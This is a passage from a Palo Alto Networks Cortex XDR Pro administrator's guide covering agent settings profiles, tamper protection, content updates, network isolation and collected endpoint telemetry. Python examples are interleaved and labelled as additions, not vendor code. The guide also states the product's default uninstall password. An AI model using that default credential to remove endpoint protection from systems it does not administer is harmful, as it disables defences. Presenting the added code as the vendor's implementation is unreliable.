tampering with the Cortex
XDR agent components by
restricting access.

Uninstall Password — —
Change the default uninstall
password to prevent
unauthorized users from
uninstalling the Cortex XDR
agent software.

Windows Security Center — — —


Configuration
Configure your Windows
Security Center preferences
to allow registration with
the Microsoft Security
Center, to allow registration
with automated Windows

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 117


© 2020 Palo Alto Networks, Inc.
Setting Windows Mac Linux Android
patch installation, or to
disable registration.

Forensics — — —
Change forensic data
collection and upload
preferences.

XDR Pro Endpoints —


Enable the Cortex XDR Pro
agent capabilities, including
enhanced data collection,
advanced responses, and
available Pro add-ons.
Requires a Cortex XDR Pro
per Endpoint license and
allocation of log storage in
Cortex Data lake.

Response Actions —
Manual response actions
that you can take on the
endpoint after a malicious
file, process, or behavior is
detected. For example, you
can terminate a malicious
process, isolate the infected
endpoint from the network,
quarantine a malicious file,
or perform additional action
as necessary to remediate
the endpoint.

Content Updates — — —
Configure how the Cortex
XDR agent performs
content updates on the
endpoint: whether to
download the content
directly from Cortex XDR
or from a peer agent,
whether to perform
immediate or delayed
updates, and whether to
perform automatic content
updates or continue using
the current content version.

Agent Auto Upgrade —

118 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security


© 2020 Palo Alto Networks, Inc.
Setting Windows Mac Linux Android
Enable the agent to
perform automatic
upgrades whenever a new
agent version is released.
You can choose to upgrade
only to minor versions in
the same line, only to major
versions, or both.

Upload Using Cellular Data — — —


Enable Android endpoints
to send unknown APK files
for inspection as soon as a
user connects to a cellular
network.

Global Agent Configurations

Global Uninstall Password —


Set the uninstall password
for all agents in the system.

Content Bandwidth —
Management
Configure the total
bandwidth to allocate for
content update distribution
within your organization.

Agent Auto Upgrade —


Configure the Cortex
XDR agent auto upgrade
scheduler and number of
parallel upgrades.

Cortex XDR Endpoint Data —


Collection
Configure the type of
information collected by
the Cortex XDR Agent for
Vulnerability Assessment
and Host insights.
See Hardened Endpoint
Security for the list of all
operating systems that
support these capabilities.

Advanced Analysis —
Enable Cortex XDR to
automatically upload alert

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Endpoint Security 119


© 2020 Palo Alto Networks, Inc.
Setting Windows Mac Linux Android
data for secondary verdict
verification and security
policy tuning.

Add a New Agent Settings Profile


Agent Settings Profiles enable you to customize Cortex XDR agent settings for different platforms and
groups of users.

STEP 1 | Add a new profile.


1. From Cortex XDR, select Endpoints > Policy Management > Profiles > + New Profile.
2. Select the platform to which the profile applies and Agent Settings as the profile type.
3. Click Next.

STEP 2 | Define the basic settings.


1. Enter a unique Profile Name to identify the profile. The name can contain only letters, numbers, or
spaces, and must be no more than 30 characters. The name you choose will be visible from the list of
profiles when you configure a policy rule.
2. To provide additional context for the purpose or business reason that explains why you are creating
the profile, enter a profile Description. For example, you might include an incident identification
number or a link to a help desk ticket.

STEP 3 | (Windows, Mac, and Linux only) Configure the Disk Space to allot for Cortex XDR agent logs.
Specify a value in MB from 100 to 10,000 (default is 5,000).

STEP 4 | (Windows and Mac only) Configure User Interface options for the Cortex XDR console.
By default, Cortex XDR uses the settings specified in the default agent settings profile and displays the default configuration in parentheses. When you select a setting other than the default, you override the default configuration for the profile.
• Tray Icon—Choose whether you want the Cortex XDR agent icon to be Visible (default) or Hidden in the notification area (system tray).
• XDR Agent Console Access—Enable this option to allow access to the Cortex XDR console.
• XDR Agent User Notifications—Enable this option to display notifications in the notification area on the endpoint. When disabled, the Cortex XDR agent operates in silent mode and does not display any notifications in the notification area. If you enable notifications, you can use the default notification messages or provide custom text (up to 50 characters) for each notification type. You can also customize a notification footer.
• Live Terminal User Notifications—Choose whether to Notify the end user and display a pop-up on the endpoint when you initiate a Live Terminal session. For Cortex XDR agents 7.3 and later releases only, you can choose to Request end-user permission to start the session. If the end user denies the request, you will not be able to initiate a Live Terminal session on the endpoint.
• (Cortex XDR agent 7.3 and later releases only) Live Terminal Active Session Indication—Enable this option to display a blinking light on the tray icon (or in the status bar for Mac endpoints) for the duration of the remote session to indicate to the end user that a live terminal session is in progress.

STEP 5 | (Android only) Configure network usage preferences.
When the option to Upload Using Cellular Data is enabled, the Cortex XDR agent uses cellular data to send unknown apps to Cortex XDR for inspection. Standard data charges may apply. When this option is disabled, the Cortex XDR agent queues any unknown files and sends them when the endpoint connects to a Wi-Fi network. If configured, the data usage setting on the Android endpoint takes precedence over this configuration.

STEP 6 | (Windows only) Configure Agent Security options that prevent unauthorized access to or tampering with the Cortex XDR agent components.
Use the default agent settings or customize them for the profile. To customize agent security capabilities:
1. Enable XDR Agent Tampering Protection.
2. By default, the Cortex XDR agent protects all agent components; however, you can configure protection more granularly for Cortex XDR agent services, processes, files, and registry values. With Traps 5.0.6 and later releases, when protection is enabled, access is read-only. In earlier Traps releases, enabling protection disables all access to services, processes, files, and registry values.

STEP 7 | (Windows and Mac only) Set an Uninstall Password.
Define and confirm a password the user must enter to uninstall the Cortex XDR agent. The uninstall password is encrypted with the PBKDF2 algorithm when transferred between Cortex XDR and Cortex XDR agents. Additionally, the uninstall password is used to protect against tampering attempts when using Cytool commands.
The default uninstall password is Password1. A new password must satisfy the following requirements:
• Contain eight or more characters.
• Contain English letters, numbers, or any of the following symbols: !()-._`~@#"'.
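The following Python is an added illustration, not code from this guide or from the Cortex XDR agent. It checks a candidate uninstall password against the two requirements above and shows the shape of a PBKDF2-based verifier for such a password; the digest, salt size and iteration count are assumptions for the example, since the guide names only the algorithm.

```python
import hashlib
import hmac
import os

MIN_LENGTH = 8
# Symbols the guide permits in addition to English letters and digits.
ALLOWED_SYMBOLS = set("!()-._`~@#\"'")


def password_problems(candidate: str) -> list:
    """Return the policy violations for a candidate uninstall password.

    An empty list means the password satisfies both requirements.
    """
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append("fewer than %d characters" % MIN_LENGTH)
    bad = sorted({c for c in candidate
                  if not ((c.isascii() and c.isalnum()) or c in ALLOWED_SYMBOLS)})
    if bad:
        problems.append("disallowed characters: " + "".join(bad))
    return problems


# PBKDF2 parameters are an assumption for this example; the guide does not
# state the salt size, iteration count or digest that Cortex XDR uses.
PBKDF2_DIGEST = "sha256"
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def derive_verifier(candidate: str, salt: bytes) -> bytes:
    """Stretch the password with PBKDF2 so the stored verifier never holds it in clear."""
    return hashlib.pbkdf2_hmac(PBKDF2_DIGEST, candidate.encode("utf-8"),
                               salt, PBKDF2_ITERATIONS)


def enroll(candidate: str) -> tuple:
    """Enforce the policy, then return (salt, verifier) for storage."""
    problems = password_problems(candidate)
    if problems:
        raise ValueError("; ".join(problems))
    salt = os.urandom(SALT_BYTES)
    return salt, derive_verifier(candidate, salt)


def verify(candidate: str, salt: bytes, verifier: bytes) -> bool:
    """Constant-time comparison of the derived value against the stored verifier."""
    return hmac.compare_digest(derive_verifier(candidate, salt), verifier)


if __name__ == "__main__":
    print(password_problems("Password1"))       # default password: no violations
    print(password_problems("pass word1"))      # space is not an allowed character
    salt, stored = enroll("Tr4ps!Uninstall")
    print(verify("Tr4ps!Uninstall", salt, stored), verify("Tr4ps!uninstall", salt, stored))
```

The check rejects any character outside the listed set (spaces and non-ASCII letters included), so a password that passes here is one the console will accept for the profile.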

STEP 8 | (Windows only) Configure Windows Security Center Integration.
The Windows Security Center is a reporting tool that monitors the system health and security state of Windows endpoints on Windows 7 and later releases. When Enabled, the Cortex XDR agent registers with the Windows Security Center as an official Antivirus (AV) software product. When registration is Disabled, the Cortex XDR agent does not register with the Windows Action Center. As a result, the Windows Action Center may indicate that Virus protection is Off, depending on the other security products installed on the endpoint.
For the Cortex XDR agent 5.0 release only, if you want to register the agent with the Windows Security Center but prevent Windows from automatically installing Meltdown/Spectre vulnerability patches on the endpoint, change the setting to Enabled (No Patches).

When you Enable the Cortex XDR agent to register with the Windows Security Center, Windows shuts down Microsoft Defender on the endpoint automatically. If you still want to allow Microsoft Defender to run on an endpoint where Cortex XDR is installed, you must Disable this option. However, Palo Alto Networks does not recommend running Windows Defender and the Cortex XDR agent on the same endpoint, since it might cause performance issues and incompatibility issues with GlobalProtect and other applications.

STEP 9 | (Windows only) Configure Forensics alert data collection options.
When the Cortex XDR agent alerts on process-related activity on the endpoint, the Cortex XDR agent collects the contents of memory and other data about the event in what is known as an alert data dump file. You can customize the Alert Data Dump File Size—Small, Medium, or Full (the largest and most complete set of information)—and whether to Automatically Upload Alert Data Dump File to Cortex XDR. During event investigation, if automatic uploading of the alert data dump file was disabled, you can manually retrieve the data.

STEP 10 | (Requires a Cortex XDR Pro per Endpoint license and allocation of log storage in Cortex Data Lake) Enable and configure Cortex XDR Pro Endpoint capabilities on the endpoint, including enhanced data collection, advanced responses, and available Pro add-ons.
1. Enable XDR Pro Endpoints Capabilities to configure which Pro capabilities to activate on the endpoint.

The Pro features are hidden until you enable the capability. Enabling this capability consumes a Cortex XDR Pro per Endpoint license.
2. (Supported on Cortex XDR agent 6.0 or later for Windows endpoints and Cortex XDR agent 6.1 or later for Mac and Linux endpoints) Enable Monitor and Collect Enhanced Endpoint Data.
By default, the Cortex XDR agent collects information about events that occur on the endpoint. If you enable Behavioral Threat Protection in a Malware Security profile, the Cortex XDR agent also collects information about all active file, process, network, and registry activity on an endpoint (see Endpoint Data Collected by Cortex XDR). When you enable the Cortex XDR agent to monitor and collect enhanced endpoint data, you enable Cortex XDR to share the detailed endpoint information with other Cortex apps. The information helps provide endpoint context when a security event occurs, so that you can gain insight into the overall event scope during investigation. The event scope includes all activities that took place during an attack, the endpoints that were involved, and the damage caused. When disabled, the Cortex XDR agent does not share endpoint activity logs.
3. (Requires the Host Insights add-on and Cortex XDR agent 7.1 or later releases) Enable Host Insights Capabilities.
• Enable Endpoint Information Collection to allow the Cortex XDR agent to collect Host Inventory information such as users, groups, services, drivers, hardware, and network shares, as well as information about applications installed on the endpoint, including CVEs and installed KBs for Vulnerability Assessment.
• (Supported on Cortex XDR agent 7.2 or later for Windows endpoints and Cortex XDR agent 7.3 or later for Mac endpoints) Enable File Search and Destroy Action Mode to allow the Cortex XDR agent to collect detailed information about files on the endpoint to create a files inventory database. The agent locally monitors any actions performed on these files and updates the local files database in real time.
With this option you can also choose the File Search and Destroy Monitored File Types, where Cortex XDR monitors all file types or only common file types. If you choose Common file types, Cortex XDR monitors the following file types:
• Windows—bat, bmp, c, cab, cmd, cpp, csv, db, dbf, doc, docb, docm, docx, dotm, dotx, dwg, dxf, exif, gif, gz, jar, java, jpeg, jpg, js, keynote, mdb, mdf, myd, pages, pdf, png, pot, potm, ppam, pps, ppsm, ppsx, ppt, pptm, pptx, ps1, pub, py, rar, rtf, sdf, sldm, sldx, sql, sqlite, sqlite3, svg, tar, txt, url, vb, vbe, vbs, vbscript, vsd, vsdx, wsf, xla, xlb, xlm, xls, xlsm, xlsx, xlt, xltm, xltx, xps, zip, and 7z.
• Mac—acm, apk, ax, bat, bin, bundle, csv, dll, dmg, doc, docm, docx, dylib, efi, exe, hta, jar, js, jse, jsf, lua, mpp, mppx, msi, mui, o, ocx, pdf, pkg, pl, plx, pps, ppsm, ppsx, ppt, pptm, pptx, py, pyc, pyo, rb, rtf, scr, sh, vds, vsd, wsf, xls, xlsm, xlsx, xsdx, and zip.
Additionally, you can exclude files that exist under a specific local path on the endpoint from inclusion in the files database.

STEP 11 | (Windows and Mac only) Response Actions.
If you need to isolate an endpoint but want to allow access for a specific application, add the process to the Network Isolation Allow List. Consider the following when building the allow list:
• When you add a specific application to your allow list for network isolation, the Cortex XDR agent continues to block some internal system processes. This is because some applications, for example ping.exe, can use other processes to facilitate network communication. As a result, if the Cortex XDR agent continues to block an application you included in your allow list, you may need to perform additional network monitoring to determine the process that facilitates the communication, and then add that process to the allow list.
• (Windows) For VDI sessions, using the network isolation response action can disrupt communication with the VDI host management system, thereby halting access to the VDI session. As a result, before using the response action you must add the VDI processes and corresponding IP addresses to your allow list.
1. +Add an entry to the allow list.
2. Specify the Process Path you want to allow and the IPv4 or IPv6 address of the endpoint. Use the * wildcard on either side to match any process or IP address. For example, specify * as the process path and an IP address to allow any process to run on the isolated endpoint with that IP address. Conversely, specify * as the IP address and a specific process path to allow the process to run on any isolated endpoint that receives this profile.
3. Click the check mark when finished.
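To make the matching semantics of the allow list concrete, here is an added Python model of how a (Process Path, IP address) entry with * wildcards is evaluated against connection attempts. It is illustrative code written for this page, not the agent's implementation; the process paths, IP addresses and the VDI agent path in the sample data are constructed placeholders.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class AllowEntry:
    """One Network Isolation Allow List row: a process path and an address; either may be '*'."""
    process_path: str
    address: str

    def validate(self) -> None:
        # A malformed address in an entry is a configuration error; surface it early.
        if self.address != "*":
            ipaddress.ip_address(self.address)  # raises ValueError when not IPv4/IPv6


def _process_matches(entry: AllowEntry, process_path: str) -> bool:
    return entry.process_path == "*" or entry.process_path == process_path


def _address_matches(entry: AllowEntry, endpoint_ip: str) -> bool:
    if entry.address == "*":
        return True
    # Compare parsed addresses so that equivalent IPv6 spellings match.
    return ipaddress.ip_address(entry.address) == ipaddress.ip_address(endpoint_ip)


def is_allowed(allow_list, process_path: str, endpoint_ip: str) -> bool:
    """True when at least one entry permits this process on an isolated endpoint with this IP."""
    return any(_process_matches(e, process_path) and _address_matches(e, endpoint_ip)
               for e in allow_list)


def evaluate(allow_list, attempts):
    """Classify (process path, endpoint IP) attempts as 'allowed' or 'blocked' under isolation."""
    for entry in allow_list:
        entry.validate()
    return [(proc, ip, "allowed" if is_allowed(allow_list, proc, ip) else "blocked")
            for proc, ip in attempts]


# Constructed sample: the first entry opens one endpoint to every process; the second
# permits a hypothetical VDI agent (placeholder path) on every isolated endpoint.
SAMPLE_ALLOW_LIST = [
    AllowEntry("*", "10.0.0.5"),
    AllowEntry(r"C:\Program Files\ExampleVDI\agent.exe", "*"),
]
SAMPLE_ATTEMPTS = [
    (r"C:\Windows\System32\ping.exe", "10.0.0.5"),
    (r"C:\Windows\System32\ping.exe", "192.168.1.10"),
    (r"C:\Program Files\ExampleVDI\agent.exe", "192.168.1.10"),
    (r"C:\Program Files\ExampleVDI\agent.exe", "2001:0db8:0000:0000:0000:0000:0000:0001"),
]

if __name__ == "__main__":
    for proc, ip, verdict in evaluate(SAMPLE_ALLOW_LIST, SAMPLE_ATTEMPTS):
        print(f"{verdict:8} {ip:40} {proc}")
```

The model evaluates each entry exactly as written. The guide's caveat above still applies: if an allowed application hands its network traffic to another process, that helper process needs its own entry before the traffic passes.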

STEP 12 | (Supported on Cortex XDR agent 7.0 or later for Windows endpoints and Cortex XDR agent 7.3 or later for Mac and Linux endpoints) Specify the Content Configuration for your Cortex XDR agents.
You have several options to configure how your Cortex XDR agent retrieves new content.
• Download Source—By default, Cortex XDR deploys serverless peer-to-peer (P2P) content distribution to the Cortex XDR agents in your LAN to reduce bandwidth loads. Within the six-hour randomization window during which the Cortex XDR agent attempts to retrieve the new content version, it broadcasts to its peer agents on the same subnet twice: once within the first hour, and once again during the following five hours. If the agent does not retrieve the new content from other agents in either query, it retrieves it from Cortex XDR directly. If you do not want to allow P2P content distribution, select the Cortex Server download source so that all Cortex XDR agents in your network retrieve the content directly from the Cortex XDR server on their next heartbeat.
To enable P2P, you must allow UDP and TCP over the port defined in Content Download Source. By default, Cortex XDR uses port 33221. You can configure another port number.

Limitations in the content download process:
• When you install the Cortex XDR agent, the agent retrieves the latest content update version available. A freshly installed agent can take between five and ten minutes (depending on your network and content update settings) to retrieve the content for the first time. During this time, your endpoint is not protected.
• When you upgrade a Cortex XDR agent to a newer Cortex XDR agent version, if the new agent cannot use the content version running on the endpoint, then the new content update starts within one minute in P2P and within five minutes from Cortex XDR.
• Content Auto-update—By default, the Cortex XDR agent always retrieves the most recent content and deploys it on the endpoint so that it is always protected with the latest security measures. However, you can Disable the automatic content download. The agent then stops retrieving content updates from the Cortex XDR server and keeps working with the current content on the endpoint.

If you disable content updates for a newly installed agent, the agent retrieves the content for the first time from Cortex XDR and then disables content updates on the endpoint.
• When you add a Cortex XDR agent to an endpoint group whose policy disables content auto-updates, the policy is applied to the added agent as well.
• Content Rollout—The Cortex XDR agent can retrieve content updates Immediately as they become available, or after a pre-configured Delayed period. When you delay content updates, the Cortex XDR agent retrieves the content according to the configured delay. For example, if you configure a delay period of two days, the agent does not use any content released in the last 48 hours.

If you disable or delay the automatic content updates provided by Palo Alto Networks, it may affect the security level in your organization.

STEP 13 | Enable Agent Auto Upgrade for your Cortex XDR agents.
To ensure your endpoints are always up to date with the latest Cortex XDR agent release, enable automatic agent upgrades. For increased flexibility, you can choose to apply automatic upgrades to major releases only, to minor releases only, or to both. It can take up to 15 minutes for new and updated auto-upgrade profile settings to take effect on your endpoints.

Automatic agent upgrades are not supported with non-persistent VDI and temporary sessions.

To control the agent auto upgrade scheduler and the number of parallel upgrades in your network, see Configure Global Agent Settings.

STEP 14 | Enable Network Location Configuration for your Cortex XDR agents.
(Requires Cortex XDR agents 7.1 and later releases) If you configure host firewall rules in your network, you must enable Cortex XDR to determine the network location of your device, as follows:
1. A domain controller (DC) connectivity test—When Enabled, the DC test checks whether the device is connected to the internal network. If the device is connected to the internal network, then it is in the organization. Otherwise, if the DC test fails or returns an external domain, Cortex XDR proceeds to a DNS connectivity test.
2. A DNS test—In the DNS test, the Cortex XDR agent submits a DNS name that is known only to the internal network. If the DNS server returns the pre-configured internal IP, then the device is within the organization. Otherwise, if the name cannot be resolved to that IP, then the device is located elsewhere. Enter the IP Address and DNS Server Name for the test.
If the Cortex XDR agent detects a network change on the endpoint, the agent triggers the device location test again and re-calculates the policy according to the new location.
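The two-stage location test described above, written out as an added Python example (not the agent's code). The DC probe and the DNS resolver are injected callables so the decision logic runs offline; treating "returned an external domain" as "a domain name other than the configured internal domain", and the internal DNS name and IP in the sample, are assumptions made for this illustration.

```python
import ipaddress
from typing import Callable, Optional

INTERNAL = "internal"
EXTERNAL = "external"


def determine_location(dc_test_enabled: bool,
                       dc_probe: Callable[[], Optional[str]],
                       resolve: Callable[[str], Optional[str]],
                       internal_domain: str,
                       dns_server_name: str,
                       expected_ip: str) -> str:
    """Return INTERNAL or EXTERNAL following the DC test, then the DNS test.

    dc_probe returns the domain the endpoint could reach a controller for, or None
    when no controller answers. resolve returns the address a name resolved to, or
    None when it does not resolve. Both are stand-ins for the agent's real probes.
    """
    if dc_test_enabled:
        domain = dc_probe()
        if domain is not None and domain.lower() == internal_domain.lower():
            return INTERNAL
        # DC unreachable, or an external domain answered: fall through to DNS test.
    answer = resolve(dns_server_name)
    if answer is None:
        return EXTERNAL
    try:
        if ipaddress.ip_address(answer) == ipaddress.ip_address(expected_ip):
            return INTERNAL
    except ValueError:
        pass  # a non-address answer counts as "could not be resolved"
    return EXTERNAL


def select_policy(location: str, policies: dict):
    """Pick the host firewall rule set for a location; call again after every network change."""
    return policies[location]


# Constructed sample values; not from the guide.
INTERNAL_DOMAIN = "corp.example"
DNS_SERVER_NAME = "location-check.corp.example"
EXPECTED_IP = "10.10.0.53"

if __name__ == "__main__":
    # Scenario: laptop off the corporate network. No DC answers and the
    # internal-only name does not resolve, so the external rule set applies.
    where = determine_location(True, lambda: None, lambda name: None,
                               INTERNAL_DOMAIN, DNS_SERVER_NAME, EXPECTED_IP)
    print(where, select_policy(where, {INTERNAL: "office-rules", EXTERNAL: "roaming-rules"}))
```

Because an attacker-controlled network can answer DNS for any name, the check insists that the answer equals the pre-configured internal IP rather than merely that the name resolves; a resolver that returns some other address leaves the endpoint on the external policy.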

STEP 15 | Save the changes to your profile.

STEP 16 | Apply Security Profiles to Endpoints.
You can do this in two ways: either Create a new policy rule using this profile from the right-click menu, or launch the new policy wizard from Policy Rules.

Configure Global Agent Settings

In addition to the customizable Agent Settings Profiles for each operating system and different endpoint targets, you can set global Agent Configurations that apply to all the endpoints in your network.

STEP 1 | From Cortex XDR, select Settings > Agent Configuration.

STEP 2 | Set the global uninstall password.
The uninstall password is required to remove a Cortex XDR agent and to grant access to the agent security components on the endpoint. You can use the default uninstall password Password1 defined in Cortex XDR or set a new one and Save. This global uninstall password applies to all the endpoints (excluding mobile) in your network. If you change the password later, the new default password applies to all new and existing profiles that used the previous default. If you want to use a different password to uninstall specific agents, you can override the default global uninstall password by setting a different password for those agents in the Agent Settings profile.

STEP 3 | Configure the content bandwidth allocated for all endpoints.
To control the amount of bandwidth allocated in your network to Cortex XDR content updates, assign a Content bandwidth management value from 20 to 10,000 Mbps. To help you with this calculation, Cortex XDR recommends an optimal Mbps value based on the number of active agents in your network, including overhead considerations for large content updates. Cortex XDR verifies that agents attempting to download the content update are within the allocated bandwidth before beginning the distribution. If the bandwidth has reached its cap, the download is refused and the agents try again later. After you set the bandwidth, Save the configuration.

STEP 4 | Configure the Cortex XDR agent auto upgrade scheduler and number of parallel upgrades.
If Agent Auto Upgrades are enabled for your Cortex XDR agents, you can control the automatic upgrade process in your network:
• Amount of agents per batch—Set the number of parallel agent upgrades (minimum 500 agents).
• Days in week—Schedule the upgrade task for specific days of the week and a specific time range. The minimum range is four hours.

STEP 5 | Configure automated Advanced Analysis of XDR Agent alerts raised by exploit protection modules.
Advanced Analysis is an additional verification method you can use to validate the verdict issued by the Cortex XDR agent. In addition, Advanced Analysis helps Palo Alto Networks researchers tune exploit protection modules for accuracy.
To initiate additional analysis you must retrieve data about the alert from the endpoint. You can do this manually on an alert-by-alert basis, or you can enable Cortex XDR to automatically retrieve the files. After Cortex XDR receives the data, it automatically analyzes the memory contents and renders a verdict. When the analysis is complete, Cortex XDR displays the results in the Advanced Analysis field of the Additional data view for the data retrieval action on the Action Center. If the Advanced Analysis verdict is benign, you can avoid subsequent blocked files for users that encounter the same behavior by enabling Cortex XDR to automatically create and distribute exceptions based on the Advanced Analysis results.
1. Configure the desired options:
• Enable Cortex XDR to automatically upload defined alert data files for advanced analysis. Advanced Analysis increases the accuracy of the Cortex XDR exploit protection modules.
• Automatically apply Advanced Analysis exceptions to your Global Exceptions list. This applies all Advanced Analysis exceptions suggested by Cortex XDR, regardless of the alert data file source.
2. Save the Advanced Analysis configuration.

STEP 6 | Configure the Cortex XDR Agent license revocation and deletion period.
This configuration applies to standard endpoints only and does not impact the license status of agents for VDIs or Temporary Sessions.
1. Configure the desired options:
• Connection Lost (Days)—Configure the number of days after which the license is returned when an agent loses its connection to Cortex XDR. Default is 30 days; range is 2 to 60 days.
• Agent Deletion (Days)—Configure the number of days after which the agent and its related data are removed from the Cortex XDR management console and database. Default is 180 days; range is 3 to 360 days, and the value must exceed the Connection Lost value.
2. Save the Agent Status configuration.
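The following Python is an added example (not Cortex XDR code) that encodes the two settings above with their ranges and the "must exceed" constraint, then maps an agent's last check-in onto the resulting lifecycle. The state names and the choice to treat the configured day count as an inclusive boundary are assumptions for the example; the guide gives the defaults and ranges but not the exact instant at which each transition occurs.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

LICENSED = "licensed"
LICENSE_RETURNED = "license returned"
DELETED = "deleted"


@dataclass(frozen=True)
class AgentStatusConfig:
    """The Agent Status settings with the defaults the guide states."""
    connection_lost_days: int = 30   # allowed range 2-60
    agent_deletion_days: int = 180   # allowed range 3-360, must exceed connection_lost_days

    def validate(self) -> None:
        if not 2 <= self.connection_lost_days <= 60:
            raise ValueError("Connection Lost must be between 2 and 60 days")
        if not 3 <= self.agent_deletion_days <= 360:
            raise ValueError("Agent Deletion must be between 3 and 360 days")
        if self.agent_deletion_days <= self.connection_lost_days:
            raise ValueError("Agent Deletion must exceed Connection Lost")


def agent_state(last_seen: datetime, now: datetime, cfg: AgentStatusConfig,
                vdi_or_temporary: bool = False) -> str:
    """Classify an agent by how long it has been silent.

    VDI and temporary-session agents are exempt from this setting, so they keep
    their license regardless of the gap (assumed reading of the guide's note).
    """
    cfg.validate()
    if vdi_or_temporary:
        return LICENSED
    silent = now - last_seen
    if silent >= timedelta(days=cfg.agent_deletion_days):
        return DELETED
    if silent >= timedelta(days=cfg.connection_lost_days):
        return LICENSE_RETURNED
    return LICENSED


def summarize(last_seen_by_agent: dict, now: datetime, cfg: AgentStatusConfig) -> dict:
    """Count agents per state; useful for spotting a fleet drifting toward deletion."""
    counts = {LICENSED: 0, LICENSE_RETURNED: 0, DELETED: 0}
    for last_seen in last_seen_by_agent.values():
        counts[agent_state(last_seen, now, cfg)] += 1
    return counts


if __name__ == "__main__":
    now = datetime(2020, 11, 2, tzinfo=timezone.utc)
    # Constructed check-in times for three hypothetical agents.
    fleet = {
        "agent-a": now - timedelta(days=3),
        "agent-b": now - timedelta(days=45),
        "agent-c": now - timedelta(days=200),
    }
    print(summarize(fleet, now, AgentStatusConfig()))
```

Validating the configuration before classifying prevents a setting that silently never returns licenses (deletion before connection-lost) from being applied.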

Endpoint Data Collected by Cortex XDR


When the Cortex XDR agent alerts on endpoint activity, the agent collects a minimum set of data about the
endpoint as described in Data Collected for All Alerts.
When you enable behavioral threat protection or EDR data collection in your endpoint security policy, the
Cortex XDR agent can also continuously monitor endpoint activity for malicious event chains identified
by Palo Alto Networks. The endpoint data that the Cortex XDR agent collects when you enable these
capabilities varies by the platform type:
• Additional Endpoint Data Collected for Windows Endpoints
• Windows Event Logs
• Additional Endpoint Data Collected for Mac Endpoints
• Additional Endpoint Data Collected for Linux Endpoints

Data Collected for All Alerts


When Cortex XDR raises an alert on an endpoint, the Cortex XDR agent collects the following data and
sends it to Cortex XDR.

Field Description

Absolute Timestamp Kernel system time

Relative Timestamp Uptime since the computer booted

Thread ID ID of the originating thread

Process ID ID of the originating process

Process Creation Time Part of process unique ID per boot session (PID + creation time)

Sequence ID Unique integer per boot session

Primary User SID Unique identifier of the user

Impersonating User SID Unique identifier of the impersonating user, if applicable

Additional Endpoint Data Collected for Windows Endpoints

Executable metadata (Traps 6.1 and later)
Events: Process start
Attributes:
• File size
• File access time

Files
Events:
• Create
• Write
• Delete
• Rename
• Move
• Modification (Traps 6.1 and later)
• Symbolic links (Traps 6.1 and later)
Attributes:
• Full path of the modified file before and after modification
• SHA256 and MD5 hash for the file after modification
• SetInformationFile for timestamps (Traps 6.1 and later)
• File set security (DACL) information (Traps 6.1 and later)
• Resolve hostnames on local network (Traps 6.1 and later)
• Symbolic-link/hard-link and reparse point creation (Traps 6.1 and later)

Image (DLL)
Events: Load
Attributes:
• Full path
• Base address
• Target process-id/thread-id
• Image size
• Signature (Traps 6.1 and later)
• SHA256 and MD5 hash for the DLL (Traps 6.1 and later)
• File size (Traps 6.1 and later)
• File access time (Traps 6.1 and later)

Process
Events:
• Create
• Terminate
Attributes:
• Process ID (PID) of the parent process
• PID of the process
• Full path
• Command line arguments
• Integrity level to determine if the process is running with elevated privileges
• Hash (SHA256 and MD5)
• Signature or signing certificate details

Thread
Events: Injection
Attributes:
• Thread ID of the parent thread
• Thread ID of the new or terminating thread
• Process that initiated the thread if from another process

Network
Events:
• Accept
• Connect
• Create
• Listen
• Close
• Bind
Attributes:
• Source IP address and port
• Destination IP address and port
• Failed connection
• Protocol (TCP/UDP)
• Resolve hostnames on local network

Network Protocols
Events:
• DNS request and UDP response
• HTTP connect
• HTTP disconnect
• HTTP proxy parsing
Attributes:
• Origin country
• Remote IP address and port
• Local IP address and port
• Destination IP address and port if proxy connection
• Network connection ID
• IPv6 connection status (true/false)

Network Statistics
Events:
• On-close statistics
• Periodic statistics
Traps sends statistics on connection close and periodically while the connection is open.
Attributes:
• Upload volume on TCP link
• Download volume on TCP link

Registry
Events:
• Registry value: Deletion, Set
• Registry key: Creation, Deletion, Rename, Addition, Modification (set information), Restore, Save
Attributes:
• Registry path of the modified value or key
• Name of the modified value or key
• Data of the modified value

Session
Events:
• Log on
• Log off
• Connect
• Disconnect
Attributes:
• Interactive log-on to the computer
• Session ID
• Session State (equivalent to the event type)
• Local (physically on the computer) or remote (connected using a terminal services session)

Host Status
Events:
• Boot
• Suspend
• Resume
Attributes:
• Host name
• OS Version
• Domain
• Previous and current state

User Presence (Traps 6.1 and later)
Events: User Detection
Attributes: Detection when a user is present or idle per active user session on the computer.

Windows Event Logs
See the Windows Event Logs table for the list of Windows Event Logs that the agent can collect.

In Traps 6.1.3 and later releases, Cortex XDR and Traps agents can collect the following Windows Event
Logs:

Table 1: Windows Event Logs

| Path | Provider | Event IDs | Description |
|---|---|---|---|
| Application | EMET | | |
| Application | Windows Error Reporting | | WER events for application crashes only |
| Application | Microsoft-Windows-User Profiles Service | 1511, 1518 | User logging on with temporary profile (1511), Cannot create profile using temporary profile (1518) |
| Application | Application Error | 1000 | Application crash/hang events, similar to WER/1001. These include the full path to the faulting EXE/Module |
| Application | Application Hang | 1002 | Application crash/hang events, similar to WER/1001. These include the full path to the faulting EXE/Module |
| Microsoft-Windows-CAPI2/Operational | | 11, 70, 90 | CAPI events: Build Chain (11), Private Key accessed (70), X509 object (90) |
| Microsoft-Windows-DNS-Client/Operational | | 3008 | DNS Query Completed (3008), without local machine name resolution events and without empty name resolution events |
| Microsoft-Windows-DriverFrameworks-UserMode/Operational | | 2004 | Detect User-Mode drivers loaded, for potential BadUSB detection |
| Microsoft-Windows-PowerShell/Operational | | 4103, 4104, 4105, 4106 | Module logging / pipeline execution (4103), Script block logging (4104), Start Command (4105), Stop Command (4106) |
| Microsoft-Windows-TaskScheduler/Operational | Microsoft-Windows-TaskScheduler | 106, 129, 141, 142, 200, 201 | Task registered (106), Created Task Process (129), Task registration deleted (141), Task disabled (142), Action started (200), Action completed (201) |
| Microsoft-Windows-TerminalServices-RDPClient/Operational | | 1024 | Log attempted TS connect to remote server |
| Microsoft-Windows-Windows Defender/Operational | | 1006, 1009 | Modern Windows Defender event provider Detection events (1006 and 1009) |
